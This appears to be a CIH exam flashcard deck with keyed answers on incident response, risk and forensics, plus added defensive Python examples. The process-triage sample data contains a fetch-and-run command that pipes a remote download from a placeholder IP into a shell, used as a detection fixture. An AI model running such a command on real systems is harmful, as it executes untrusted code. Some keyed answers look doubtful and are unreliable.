CIH Flashcards
Preparation for the CIH exam
A Distributed Denial-of-Service (DDoS) attack is a more common type of DoS attack, where a single system is targeted by a large number of infected machines over the Internet. In a DDoS attack, attackers first infect multiple systems which are known as:
Spyware
Zombies
Worms
Trojans
Zombies
Which one of the following is the correct flow of the stages in an incident response?
Eradication –> Containment –> Identification –> Preparation –> Recovery –> Follow-up
Identification –> Preparation –> Containment –> Recovery –> Follow-up –> Eradication
Containment –> Identification –> Preparation –> Recovery –> Follow-up –> Eradication
Preparation –> Identification –> Containment –> Eradication –> Recovery –> Follow-up
Preparation –> Identification –> Containment –> Eradication –> Recovery –> Follow-up
Risk analysis involves the process of defining and evaluating dangers. The numerical determination of the probability of an adverse event, and the extent of the losses due to the event, refers to which approach of risk determination?
Descriptive risk analysis
Analytical risk analysis
Quantitative risk analysis
Qualitative risk analysis
Quantitative risk analysis
One of the main objectives of incident management is to prevent incidents and attacks by tightening the physical security of the system or infrastructure. According to CERT’s incident management process, which stage focuses on implementing infrastructure improvements resulting from postmortem reviews or other process improvement mechanisms?
Detection
Triage
Protection
Preparation
Protection
Insider threats can be detected by observing concerning behaviors exhibited by insiders, such as conflicts with supervisors and coworkers, decline in performance, tardiness, or unexplained absenteeism. Select the technique that helps in detecting insider threats.
Categorizing information according to its sensitivity and access rights
Protecting computer systems by implementing proper controls
Making it compulsory for employees to sign a nondisclosure agreement
Correlating known patterns of suspicious and malicious behavior
Correlating known patterns of suspicious and malicious behavior
Risk management consists of three processes: risk assessment, risk mitigation, and evaluation and assessment. Risk assessment determines the extent of the potential threat and the risk associated with an IT system throughout its SDLC. How many primary steps does NIST’s risk assessment methodology involve?
Nine
Twelve
Four
Six
Nine
An incident response plan consists of a set of instructions to detect and respond to an incident. It defines the areas of responsibility and creates procedures for handling various computer security incidents. Which of the following is an essential pre-requisite for an incident response plan?
Availability of forensic experts
An approval from a court of law
Incident analysis report
Company’s financial support
Company’s financial support
Incident handling and response steps help you to detect, identify, respond to, and manage an incident. Which of the following helps in recognizing and separating the infected hosts from the information system?
Configuring firewall to default settings
Browsing particular government websites
Inspecting the processes running on the system
Sending mails to only group of friends
Inspecting the processes running on the system
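The card above names process inspection as the way to pick out infected hosts. The following is an added example, not part of the original flashcard deck: a first-pass triage over a host's process list that returns the processes justifying isolation of the host. The process records are constructed sample data shaped like `ps -eo pid,ppid,user,comm,args` with the resolved `/proc/<pid>/exe` target added; the expected daemon paths, the list of world-writable directories, the web-server names and the known-bad hash are illustrative assumptions.

```python
"""Triage a host's process list to decide whether to isolate it (added example)."""
import hashlib
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    name: str      # comm
    exe: str       # resolved /proc/<pid>/exe target, "(deleted)" suffix kept
    cmdline: str


# Assumption: hash of a binary an IOC feed has flagged (constructed here).
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed malicious sample").hexdigest()}

# Assumption: where these daemons live on the build being inspected.
EXPECTED_PATH = {
    "sshd": "/usr/sbin/sshd",
    "cron": "/usr/sbin/cron",
    "systemd": "/usr/lib/systemd/systemd",
}
WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
WEB_SERVERS = {"apache2", "nginx", "httpd"}


def inspect(procs, exe_hashes):
    """Return {pid: [reasons]} for processes that justify isolating the host.

    exe_hashes maps an exe path to the SHA-256 of the file on disk.
    """
    by_pid = {p.pid: p for p in procs}
    findings = {}
    for p in procs:
        reasons = []
        path = p.exe.replace(" (deleted)", "")
        if path.startswith(WRITABLE_DIRS):
            reasons.append("executable runs from a world-writable directory")
        if p.exe.endswith(" (deleted)"):
            reasons.append("executable was unlinked after launch")
        expected = EXPECTED_PATH.get(p.name)
        if expected and path != expected:
            reasons.append(f"{p.name} is not running from {expected}")
        if exe_hashes.get(path) in KNOWN_BAD_SHA256:
            reasons.append("executable hash matches a known-bad IOC")
        parent = by_pid.get(p.ppid)
        if parent and parent.name in WEB_SERVERS and p.name in {"sh", "bash", "dash"}:
            reasons.append("shell spawned by a web server process")
        if reasons:
            findings[p.pid] = reasons
    return findings


# Constructed snapshot of a web server that has been compromised.
SAMPLE_PROCS = [
    Proc(1, 0, "root", "systemd", "/usr/lib/systemd/systemd", "/sbin/init"),
    Proc(612, 1, "root", "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D"),
    Proc(801, 1, "www-data", "apache2", "/usr/sbin/apache2", "/usr/sbin/apache2 -k start"),
    Proc(4410, 801, "www-data", "sh", "/usr/bin/dash", "sh -c curl http://203.0.113.7/x|sh"),
    Proc(4417, 4410, "www-data", "sshd", "/tmp/.x/sshd", "./sshd"),
    Proc(4499, 1, "root", "kworker", "/var/tmp/kw (deleted)", "kworker"),
]
# Constructed: the only on-disk hash we bothered to compute for the sample.
SAMPLE_HASHES = {"/tmp/.x/sshd": hashlib.sha256(b"constructed malicious sample").hexdigest()}


def triage_sample():
    return inspect(SAMPLE_PROCS, SAMPLE_HASHES)


if __name__ == "__main__":
    for pid, reasons in triage_sample().items():
        print(pid, "->", "; ".join(reasons))
```

On a real host the same rules can be fed from `ps` plus `readlink /proc/<pid>/exe`; the point is that the decision to separate the host rests on what is executing now, not only on what an antivirus signature says about files on disk.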
Incident handling and response steps help you to detect, identify, respond to, and manage an incident. Which of the following steps focuses on limiting the scope and extent of an incident?
Identification
Data Collection
Containment
Eradication
Containment
In which of the steps of NIST’s risk assessment methodology are the boundaries of the IT system, along with the resources and the information that constitute the system, identified?
Control Recommendations
Control Analysis
System Characterization
Likelihood Determination
System Characterization
Which of the following incident recovery testing methods works by creating a mock disaster, like a fire, to identify the reaction of the procedures that are implemented to handle such situations?
Scenario testing
Procedure testing
Facility testing
Live Walk Through testing
Scenario testing
US-CERT and federal civilian agencies use the reporting timeframe criteria in the federal agency reporting categorization. What is the timeframe required to report an incident under the CAT 4 federal agency category?
Weekly
Monthly
Within two (2) hours of discovery/detection
Within four (4) hours of discovery/detection if the successful attack is still ongoing and the agency is unable to successfully mitigate activity
Weekly
Identify the network security incident in which intended authorized users are prevented from using a system, network, or application because the network is flooded with a high volume of traffic that consumes all available network resources.
SQL injection
URL manipulation
XSS attack
Denial-of-Service
Denial-of-Service
Multiple component incidents consist of a combination of two or more attacks in a system. Which of the following is not a multiple component incident?
An insider intentionally deleting files from a workstation
An attacker using email with malicious code to infect internal work station
An attacker redirecting a user to a malicious website and infecting the user’s system with a Trojan
An attacker infecting a machine to launch a DDoS attack
An insider intentionally deleting files from a workstation
The data on affected systems must be backed up so that it can be retrieved if it is damaged during incident response. The system backup can also be used for further investigation of the incident. Identify the stage of the incident response and handling process in which a complete backup of the infected system is carried out.
Containment
Incident recording
Incident investigation
Eradication
Containment
An access control policy authorizes a group of users to perform a set of actions on a set of resources. Access to resources is based on need, that is, on whether a particular job role requires the use of those resources. Which of the following is not a fundamental element of an access control policy?
Action group: Group of actions performed by the user on resources
Development group: Group of persons who develop the policy
Access group: Group of users to which the policy applies
Resource group: Resources controlled by the policy
Development group: Group of persons who develop the policy
Host-based evidence is the evidence gathered and available on a computer system. It may include logs, records, documents, and any other information stored in a computer system. Network-based evidence is the information gathered from the network resources. Which of the following is host-based evidence?
Wiretaps
IDS logs
Router logs
State of network interface
State of network interface
Organizations, or incident response teams, need to protect the evidence for any future legal actions that may be taken against perpetrators that intentionally attacked the computer system. Evidence protection is also required to meet legal compliance issues. Which of the following documents helps in protecting evidence from physical or logical damage?
Chain-of-Custody
Chain-of-Precedence
Forensic analysis report
Network and Host log records
Chain-of-Custody
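Two of the cards above fit together in practice: the containment-stage backup of the infected system and the chain-of-custody record that protects that backup from logical damage. The following is an added example, not part of the original deck, showing the mechanics: hash the acquired image at collection time, then keep an append-only custody log in which every entry commits to the previous one, so that a later edit to the log or to the image is detectable. The "disk image" is a constructed byte string; the case number, custodians and timestamps are sample data.

```python
"""Evidence acquisition hash plus a hash-chained chain-of-custody log (added example)."""
import hashlib
import json


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CustodyLog:
    def __init__(self, case_id: str, evidence_id: str, image: bytes, custodian: str, when: str):
        self.case_id = case_id
        self.evidence_id = evidence_id
        self.image_hash = sha256_hex(image)   # acquisition hash, fixed at collection
        self.entries = []
        self._append("acquired", custodian, when, "image taken during containment")

    def _append(self, action, custodian, when, note):
        prev = self.entries[-1]["entry_hash"] if self.entries else "0" * 64
        body = {
            "seq": len(self.entries),
            "action": action,
            "custodian": custodian,
            "time": when,
            "note": note,
            "image_hash": self.image_hash,
            "prev_hash": prev,
        }
        # Canonical JSON so the hash does not depend on key order.
        body["entry_hash"] = sha256_hex(json.dumps(body, sort_keys=True).encode())
        self.entries.append(body)

    def transfer(self, custodian, when, note=""):
        self._append("transferred", custodian, when, note)

    def verify(self, image: bytes):
        """Return (ok, problems): checks the image hash and every link of the chain."""
        problems = []
        if sha256_hex(image) != self.image_hash:
            problems.append("image hash differs from acquisition hash")
        prev = "0" * 64
        for i, entry in enumerate(self.entries):
            recorded = entry["entry_hash"]
            body = {k: v for k, v in entry.items() if k != "entry_hash"}
            if body["prev_hash"] != prev or body["seq"] != i:
                problems.append(f"entry {i}: chain link broken")
            if sha256_hex(json.dumps(body, sort_keys=True).encode()) != recorded:
                problems.append(f"entry {i}: contents altered")
            prev = recorded   # the recorded hash is what the next entry committed to
        return (not problems, problems)


# Constructed stand-in for a raw disk image.
IMAGE = b"constructed disk image bytes: MBR, partition table, files..."


def demo():
    """Build a sample log, then show that image and log tampering are both caught."""
    log = CustodyLog("IR-2024-017", "EV-01", IMAGE, "IR analyst", "2024-05-01T09:12:00Z")
    log.transfer("forensic examiner", "2024-05-01T14:30:00Z", "sealed evidence bag #A17")
    log.transfer("evidence locker", "2024-05-02T08:00:00Z")
    ok_clean, _ = log.verify(IMAGE)
    ok_image, _ = log.verify(IMAGE + b"\x00")          # image modified after acquisition
    log.entries[1]["custodian"] = "someone else"         # custody record rewritten
    ok_log, problems_log = log.verify(IMAGE)
    return ok_clean, ok_image, ok_log, problems_log


if __name__ == "__main__":
    print(demo())
```

Rewriting an entry and recomputing its own hash does not help the tamperer either: the next entry's `prev_hash` still holds the original value, so `verify` reports a broken chain link at the following entry.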
An organization faced an information security incident, where a disgruntled employee passed sensitive access control information to a competitor. The organization’s incident response manager, upon investigation, found that the incident must be handled within a few hours on the same day to maintain business continuity and market competitiveness. How would you categorize such information security incidents?
High level incident
Middle level incident
Ultra-high level incident
Low level incident
Middle level incident
Which among the following CERTs is an Internet provider to higher education institutions and various other research institutes in the Netherlands, and deals with all cases related to computer security incidents in which a customer is involved, either as a victim or as a suspect?
Funet CERT
SURFnet-CERT
NET-CERT
DFN-CERT
SURFnet-CERT
The goal of incident response is to handle the incidents in a way that minimizes damage and reduces recovery time and costs. Which of the following does not constitute a goal of incident response?
Dealing properly with legal issues that may arise during incidents
Using information gathered during incident handling to prepare for handling future incidents in a better way and to provide stronger protection for systems and data
Helping personnel to recover quickly and efficiently from security incidents, minimizing loss or theft of information and disruption of services
Dealing with human resource department and various employee conflict behaviors
Dealing with human resource department and various employee conflict behaviors
The insider’s incident response plan helps the organization to minimize or limit the damage caused by malicious insiders. Organizations should ensure that insider perpetrators are not included in the response team and are not aware of its progress. Which of the following statements is not true about the incident response plan?
The organization should regularly update employees on different forms of external and internal attacks through training programs
The employees should also be trained on how to report suspicious behaviors of the insiders
The organization should share or provide the details of the insider’s incident response plan with all employees
Persons responsible for handling insider incidents should be trained on the contents and execution of the response plan
The organization should share or provide the details of the insider’s incident response plan with all employees
A computer virus hoax is a message warning the recipient of a non-existent computer virus threat. The message is usually a chain e-mail that tells the recipient to forward it to everyone they know. Which of the following is not a symptom of virus hoax message?
The message warns to delete certain files if the user does not take appropriate action
The message prompts the user to install Anti-virus
The message from a known email id is caught by SPAM filters due to change in filter settings
The message prompts the end user to forward it to his/her email contact list and gain monetary benefits in doing so
The message from a known email id is caught by SPAM filters due to change in filter settings
One of the goals of a CSIRT is to manage security problems by taking a certain approach towards the customers’ security vulnerabilities, and by responding effectively to potential information security incidents. Identify the incident response approach that focuses on developing the infrastructure and security processes before the occurrence or detection of an event or incident.
Interactive approach
Qualitative approach
Proactive approach
Proactive approach
The type of relationship between a CSIRT and its constituency has an impact on the services provided by the CSIRT. Identify the level of authority that enables the members of a CSIRT to undertake any necessary actions on behalf of their constituency.
Half-level authority
Shared-level authority
Mid-level authority
Full-level authority
Full-level authority
Sam, an employee of a multinational company, uses his company’s account to send e-mails to a third party with a spoofed mail address. How would you categorize this type of incident?
Denial-of-Service incident
Network intrusion incident
Unauthorized access incident
Inappropriate usage incident
Inappropriate usage incident
A computer risk policy is a set of ideas to be implemented to overcome the risk associated with computer security incidents. Identify the procedure that is not part of the computer risk policy.
Provisions for continuing support if there is an interruption in the system or if the system crashes
Procedures for the ongoing training of employees authorized to access the system
Procedure to identify security funds to hedge risk
Procedures to monitor the efficiency of the security controls
Procedures to monitor the efficiency of the security controls
Computer forensics is the branch of forensic science in which legal evidence is found in any computer or on any digital media device. Of the following, who is responsible for examining the evidence acquired and separating the useful evidence?
Evidence Manager
Evidence Examiner/Investigator
Evidence Documenter
Evidence Supervisory
Evidence Examiner/Investigator
An information system processes data into useful information to achieve specified organizational or individual goals. It accepts, processes, and stores data in the form of records in a computer system, and automates some of the information processing activities of the organization. Who is responsible for implementing and controlling the security measures of an information system?
Information Custodian
Information Owner
Information Implementer
Information Consultant
Information Custodian
In a qualitative risk analysis, risk is calculated in terms of:
(Attack Success + Criticality) – (Countermeasures)
Probability of Loss X Loss
(Countermeasures + Magnitude of Impact)- (Reports from prior risk assessments)
Asset criticality assessment –(Risks and Associated Risk Levels)
(Attack Success + Criticality) – (Countermeasures)
Which one of the following is an appropriate flow of the incident recovery steps?
System Restoration –> System Monitoring –> System Validation –> System Operations
System Operations –> System Restoration –> System Validation –> System Monitoring
System Validation –> System Operations –> System Restoration –> System Monitoring
System Restoration –> System Validation –> System Operations –> System Monitoring
System Restoration –> System Validation –> System Operations –> System Monitoring
Risk is defined as the probability of the occurrence of an incident. Risk formulation generally begins with the likeliness of an event’s occurrence, the harm it may cause, and is usually denoted as:
Significances
Probability
Magnitudes
Consequences
Consequences
An audit trail policy governs the collection of audit trails, that is, series of records of computer events about an operating system, an application, or user activities. Which of the following statements is not true for an audit trail policy?
It helps in reconstructing the events after a problem has occurred
It helps in calculating intangible losses to the organization due to an incident
It helps in compliance to various regulatory laws, rules, and guidelines
It helps in tracking individual actions and allows users to be personally accountable for their actions
It helps in calculating intangible losses to the organization due to an incident
Computer forensics is a methodical series of techniques and procedures for gathering evidence from computing equipment, various storage devices and/or digital media that can be presented in a court of law in a coherent and meaningful format. Which one of the following is an appropriate flow of steps in the computer forensics process?
Examination> Analysis> Preparation> Collection> Reporting
Analysis> Preparation> Collection> Reporting> Examination
Preparation> Collection> Examination> Analysis> Reporting
Preparation> Analysis> Collection> Examination> Reporting
Preparation> Collection> Examination> Analysis> Reporting
Quantitative risk is the numerical determination of the probability of an adverse event, and the extent of the losses due to the event. Quantitative risk is calculated as:
Significant Risks x Probability of Loss X Loss
(Probability of Loss) / (Loss)
(Loss) / (Probability of Loss)
(Probability of Loss) X (Loss)
(Probability of Loss) X (Loss)
The incident management team provides support to all users in the organization that are affected by the threat or attack. The organization’s internal auditor is part of the incident response team. Identify one of the responsibilities of the internal auditor as a part of the incident response team.
Perform necessary action required to block the network traffic from the suspected intruder
Coordinate incident containment activities with the information security officer
Configure information security controls
Identify and report security loopholes to the management for necessary actions
Identify and report security loopholes to the management for necessary actions
When an employee is terminated from his/her job, what should be the next immediate step taken by an organization?
The access requests granted to an employee should be documented and vetted by a supervisor
All access rights of the employee to physical locations, networks, systems, applications, and data should be disabled
The organization should enforce separation of duties
The organization should monitor the activities of the system administrators and privileged users who have permissions to access the sensitive information
All access rights of the employee to physical locations, networks, systems, applications, and data should be disabled
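The access control policy card earlier on this page names the three elements of such a policy (access group, action group, resource group), and the termination card above answers that every access right must be disabled at once. The following is an added example, not from the original deck, that puts the two together as code: a deny-by-default, group-based policy evaluator, and an offboarding step that removes a user from every access group, logical and physical. Users, groups, resources and policies are constructed sample data; the policy and decision rules are my assumptions, not a particular product's.

```python
"""Group-based access control policy with an offboarding step (added example)."""
from dataclasses import dataclass, field


@dataclass
class Policy:
    name: str
    access_group: str          # group of users the policy applies to
    action_group: frozenset    # actions those users may perform
    resource_group: frozenset  # resources controlled by the policy
    effect: str = "allow"      # "allow" or "deny"


@dataclass
class AccessControl:
    members: dict = field(default_factory=dict)   # group name -> set of users
    policies: list = field(default_factory=list)

    def groups_of(self, user):
        return {g for g, users in self.members.items() if user in users}

    def is_allowed(self, user, action, resource):
        """Deny by default; an explicit deny policy overrides any allow."""
        groups = self.groups_of(user)
        decision = False
        for p in self.policies:
            if p.access_group not in groups:
                continue
            if action not in p.action_group or resource not in p.resource_group:
                continue
            if p.effect == "deny":
                return False
            decision = True
        return decision

    def offboard(self, user):
        """Remove the user from every access group; returns the groups touched."""
        removed = []
        for group, users in self.members.items():
            if user in users:
                users.discard(user)
                removed.append(group)
        return sorted(removed)


def build_sample():
    ac = AccessControl()
    # Constructed: logical groups plus a physical-access (badge) group.
    ac.members = {
        "engineering": {"sam", "priya"},
        "vpn-users": {"sam", "priya", "contractor1"},
        "badge-datacenter": {"sam"},
        "finance": {"lee"},
    }
    ac.policies = [
        Policy("repo-rw", "engineering", frozenset({"read", "write"}), frozenset({"git:app"})),
        Policy("vpn", "vpn-users", frozenset({"connect"}), frozenset({"net:vpn"})),
        Policy("dc-door", "badge-datacenter", frozenset({"enter"}), frozenset({"room:dc1"})),
        Policy("ledger-ro", "finance", frozenset({"read"}), frozenset({"db:ledger"})),
        Policy("no-ledger-eng", "engineering", frozenset({"read", "write"}), frozenset({"db:ledger"}), "deny"),
    ]
    return ac


def termination_demo():
    """Show why partial offboarding leaves access behind."""
    ac = build_sample()
    before = (ac.is_allowed("sam", "write", "git:app"), ac.is_allowed("sam", "enter", "room:dc1"))
    ac.members["engineering"].discard("sam")          # only the repo group was cleaned up
    still_has_vpn = ac.is_allowed("sam", "connect", "net:vpn")
    removed = ac.offboard("sam")                       # now every remaining group
    after = any(
        ac.is_allowed("sam", a, r)
        for a in ("read", "write", "connect", "enter")
        for r in ("git:app", "net:vpn", "room:dc1", "db:ledger")
    )
    return before, still_has_vpn, removed, after


if __name__ == "__main__":
    print(termination_demo())
```

The `offboard` method is the code form of the card's answer: rights live in many places (VPN, repositories, badge systems, databases), and revocation has to enumerate all of them rather than the one the manager happened to remember.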
Which of the following terms may be defined as “a measure of possible inability to achieve a goal, objective, or target within a defined security, cost, plan, and technical limitations that adversely affects the organization’s operations and revenues”?
Incident Response
Threat
Vulnerability
Risk
Risk
A file or an object found on a system that might be involved in attacking systems and networks is known as an “artifact”. Artifact handling involves receiving information about artifacts used in intruder attacks, probes, and other unauthorized or disruptive activities. Identify the CSIRT service category that artifact handling belongs to.
Reactive services
Proactive services
Incident tracking and reporting systems services
Security quality management services
Reactive services
An incident is analyzed for its nature, intensity, and its effects on the network and systems. Which stage of the incident response and handling process involves auditing the system and network log files?
Identification
Containment
Incident recording
Reporting
Identification
Contingency planning enables organizations to develop and maintain effective methods to handle emergencies. Every organization will have its own specific requirements that the planning should address. There are five major components of the IT contingency plan: supporting information, notification/activation, recovery, reconstitution, and plan appendices. What is the main purpose of a reconstitution plan?
To restore the original site, test systems to prevent the incident, and terminate contingency operations
To provide the introduction and detailed concept of the contingency plan
To provide a sequence of recovery activities with the help of recovery procedures
To define the notification procedures, damage assessments, and offers the plan activation
To restore the original site, test systems to prevent the incident, and terminate contingency operations
Identifying and analyzing an incident is a very critical part of the incident response procedure. Which of the following signs do not indicate a computer security incident?
System crashes or poor system performance
Failed logon attempts and creation of new user accounts
A system alarm or similar indication from an intrusion-detection system
Smoke emitting from the system
Smoke emitting from the system
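The identification card earlier on the page says this stage is where system and network log files are audited, and the card above lists failed logon attempts and creation of new user accounts among the signs to look for. The following is an added example, not part of the original deck, that audits a few authentication log lines for exactly that sequence: a burst of failed logons from one source, a successful logon from the same source, and a new account created shortly afterwards. The log lines are constructed in Linux `auth.log` style with documentation-range IP addresses; the thresholds, the window and the year assumed for the year-less syslog timestamps are my assumptions.

```python
"""Audit of authentication log lines during the identification stage (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>[\w-]+)\[\d+\]: (?P<msg>.*)$"
)
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
ACCEPT_RE = re.compile(r"Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")
NEWUSER_RE = re.compile(r"new user: name=(?P<user>[^,]+)")

# Constructed sample: password guessing, then a hit, then persistence via useradd.
SAMPLE_LOG = """\
May  3 02:14:07 web01 sshd[4011]: Failed password for invalid user admin from 198.51.100.23 port 51522 ssh2
May  3 02:14:09 web01 sshd[4012]: Failed password for invalid user oracle from 198.51.100.23 port 51523 ssh2
May  3 02:14:11 web01 sshd[4013]: Failed password for root from 198.51.100.23 port 51524 ssh2
May  3 02:14:13 web01 sshd[4014]: Failed password for deploy from 198.51.100.23 port 51525 ssh2
May  3 02:14:15 web01 sshd[4015]: Failed password for deploy from 198.51.100.23 port 51526 ssh2
May  3 02:14:18 web01 sshd[4016]: Failed password for deploy from 198.51.100.23 port 51527 ssh2
May  3 02:14:40 web01 sshd[4020]: Accepted password for deploy from 198.51.100.23 port 51530 ssh2
May  3 02:15:02 web01 useradd[4031]: new user: name=svc_backup, UID=1007, GID=1007, home=/home/svc_backup, shell=/bin/bash
May  3 08:30:12 web01 sshd[5102]: Failed password for alice from 192.0.2.44 port 40012 ssh2
May  3 08:30:20 web01 sshd[5103]: Accepted publickey for alice from 192.0.2.44 port 40013 ssh2
""".splitlines()


def parse_ts(text, year=2024):
    # syslog timestamps carry no year; assume one so events can be ordered.
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def audit(lines, fail_threshold=5, window=timedelta(minutes=10)):
    """Return [(severity, description)] in chronological order."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, msg = parse_ts(m["ts"]), m["msg"]
        if (f := FAILED_RE.search(msg)):
            events.append((ts, "failed", f["user"], f["ip"]))
        elif (a := ACCEPT_RE.search(msg)):
            events.append((ts, "accepted", a["user"], a["ip"]))
        elif (n := NEWUSER_RE.search(msg)):
            events.append((ts, "newuser", n["user"], None))
    events.sort(key=lambda e: e[0])

    findings = []
    fails = defaultdict(list)   # source ip -> timestamps of failures inside the window
    suspect_logins = []         # (ts, user, ip) accepted right after a burst
    for ts, kind, user, ip in events:
        if kind == "failed":
            fails[ip] = [t for t in fails[ip] if ts - t <= window] + [ts]
            if len(fails[ip]) == fail_threshold:        # report each burst once
                findings.append(("medium", f"{fail_threshold} failed logons from {ip} within {window}"))
        elif kind == "accepted":
            if len(fails[ip]) >= fail_threshold:
                suspect_logins.append((ts, user, ip))
                findings.append(("high", f"successful logon for {user} from {ip} after a password-guessing burst"))
        elif kind == "newuser":
            recent = [s for s in suspect_logins if ts - s[0] <= window]
            if recent:
                findings.append(("high", f"account {user} created within {window} of suspect logon from {recent[-1][2]}"))
            else:
                findings.append(("low", f"account {user} created; confirm against change records"))
    return findings


def audit_sample():
    return audit(SAMPLE_LOG)


if __name__ == "__main__":
    for severity, text in audit_sample():
        print(f"[{severity}] {text}")
```

Alice's single mistyped password followed by a key-based logon produces nothing, which is the point of correlating the signs rather than alerting on each one: a lone failed logon is noise, the same source failing, succeeding and then adding an account is an incident to escalate to containment.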
In the Control Analysis stage of NIST’s risk assessment methodology, technical and nontechnical control methods are classified into two categories. What are these two control categories?
Preventive and Detective controls
Predictive and Detective controls
Detective and Disguised controls
Preventive and Predictive controls
Preventive and Detective controls
Which policy recommends controls for securing and tracking organizational resources?
Access control policy
Administrative security policy
Acceptable use policy
Asset control policy
Asset control policy
Except for some common roles, the roles in an IRT are distinct for every organization. Which among the following is the role played by the Incident Coordinator of an IRT?
Links the appropriate technology to the incident to ensure that the foundation’s offices are returned to normal operations as quickly as possible
Links the groups that are affected by the incidents, such as legal, human resources, different business areas, and management
Applies the appropriate technology and tries to eradicate and recover from the incident
Focuses on the incident and handles it from management and technical point of view
Links the groups that are affected by the incidents, such as legal, human resources, different business areas, and management
“Information warfare” is conflict that uses Information/Information systems as weapons. “Offensive” and “defensive” are two types of information warfare. Which of the following is an example of defensive information warfare?
Disabling SSID broadcasts so that unauthorized users cannot detect the presence of a wireless network
Hijacking television and radio transmissions for generating disinformation
Spoofing or disabling the communication networks of a competitor or an enemy
Jamming radio transmissions
Disabling SSID broadcasts so that unauthorized users cannot detect the presence of a wireless network
Policies are designed to protect the organizational resources on the network by establishing set rules and procedures. Which of the following policies authorizes a group of users to perform a set of actions on a set of resources?
Documentation policy
Audit Trail Policy
Logging Policy
Access Control Policy
Access Control Policy
Signs of an Incident are categorized into one of two categories: Precursor or Indication. Precursor indicates the possibility of a security incident occurrence, and Indication implies that an incident has probably occurred or is in progress. Identify which of the following is a precursor to an incident?
The network administrator notices an unusual deviation from the typical network traffic flows
A user approaches the help desk to report an abusive/threatening email
Warning from an antivirus program or scanner that threat(s) from virus/worm is identified on the user’s system.
A newly found vulnerability in the organization’s server, in case the vendor announces it
A newly found vulnerability in the organization’s server, in case the vendor announces it
Identify a standard national process which establishes a set of activities, general tasks, and a management structure to certify and accredit systems that will maintain the information assurance (IA) and security posture of a system or site.
NIASAP
NIACAP
NIAAAP
NIPACP
NIACAP
The network perimeter should be configured in such a way that it denies all incoming and outgoing traffic/services that are not required. Which service listed below, if blocked, can help in preventing a Denial of Service attack?
SMTP service
SAM service
POP3 service
Echo service
Echo service
A security policy will take the form of a document or a collection of documents, depending on the situation or usage. It can also become a point of reference in case a violation occurs that results in a dismissal or other penalty. Which of the following is NOT true for a good security policy?
It must be approved by a court of law after verification of stated terms and facts
It must clearly define the areas of responsibility for the users, administrators, and management
It must be enforceable with security tools where appropriate, and with sanctions, where actual prevention is not technically feasible
It must be implementable through system administration procedures, publishing of acceptable use guidelines, or other appropriate methods
It must be approved by a court of law after verification of stated terms and facts
The insiders risk matrix consists of technical literacy and business process knowledge vectors. Considering the matrix, one can conclude that:
If the insiders’ technical literacy and process knowledge are high, the risk posed by the threat will be high
If the insiders’ technical literacy is low and process knowledge is high, the risk posed by the threat will be insignificant
If the insiders’ technical literacy is high and process knowledge is low, the risk posed by the threat will be high
If the insiders’ technical literacy and process knowledge are high, the risk posed by the threat will be insignificant
If the insiders’ technical literacy and process knowledge are high, the risk posed by the threat will be high
A computer forensic investigator must perform a proper investigation to protect digital evidence. During the investigation, an investigator needs to process large amounts of data using a combination of automated and manual methods. Identify the computer forensic process involved.
Preparation
Collection
Reporting
Examination
Examination
Incident handling and response steps help you to detect, identify, respond to, and manage an incident. Which of the following steps focuses on limiting the scope and extent of an incident?
Identification
Eradication
Data Collection
Containment
Containment
Business continuity is defined as the ability of an organization to continue to function even after a disastrous event, accomplished through the deployment of redundant hardware and software, the use of fault-tolerant systems, and a solid backup and recovery strategy. Identify the plan that is a mandatory part of a business continuity plan.
New business strategy plan
Business recovery plan
Forensics procedure plan
Sales and marketing plan
Business recovery plan
Information gathering is an integral part of information warfare. Which of the following activities is a part of passive information gathering?
Obtaining details of the target organization by scanning their network
Obtaining details of the target organization by taking services of underground hacking forums
Obtaining details of the target organization that are freely available on the Internet, and through various other techniques without coming into direct contact with the organization
Obtaining details of the target organization that are freely available on the Internet, and through various other techniques by coming into direct contact with the organization
Obtaining details of the target organization that are freely available on the Internet, and through various other techniques without coming into direct contact with the organization
Which policy recommends controls for securing and tracking organizational resources?
Administrative security policy
Access control policy
Asset control policy
Acceptable use policy
Asset control policy
Which of the following tools is a stand-alone utility used to detect and remove specific viruses? It is not a substitute for full anti-virus but assists administrators and users while dealing with an infected system, and utilizes next generation scan engine technology that includes process scanning, digitally signed DAT files and scan performance optimizations.
Site Advisor
Tripwire Enterprise
HijackThis
Stinger
Stinger
A US Federal agency network was the target of a DoS attack that prevented and impaired the normal authorized functionality of the networks. According to the agency’s reporting timeframe guidelines, this incident should be reported within two (2) hours of discovery/detection if the successful attack is still ongoing and the agency is unable to successfully mitigate the activity. Which US Federal Agency incident category does this incident belong to?
CAT 5
CAT 2
CAT 1
CAT 6
CAT 2
An incident recovery plan is a statement of actions that should be taken before, during, or after an incident. Identify which of the following is not an objective of the incident recovery plan.
Creating new business processes to maintain profitability after incident
Providing a standard for testing the recovery plan
Avoiding the legal liabilities arising due to incident
Providing assurance that systems are reliable
Creating new business processes to maintain profitability after incident
A threat source does not present a risk if there is no vulnerability that can be exercised by that threat source. Identify the step in which the different threats and threat sources are determined.
Threat identification
System characterization
Vulnerability identification
Control Analysis
Threat identification
Which one of the following is an appropriate flow of the incident recovery steps?
System Restoration –> System Validation –> System Operations –> System Monitoring
System Validation –> System Operations –> System Restoration –> System Monitoring
System Operations –> System Restoration –> System Validation –> System Monitoring
System Restoration –> System Monitoring –> System Validation –> System Operations
System Restoration –> System Validation –> System Operations –> System Monitoring
A risk mitigation strategy determines the circumstances under which an action has to be taken to minimize and overcome risks. Identify the risk mitigation strategy that focuses on minimizing the probability of risks and losses by searching for vulnerabilities in the system and appropriate controls.
Research and acknowledgment
Risk limitation
Risk absorption
Risk assumption
Research and acknowledgment
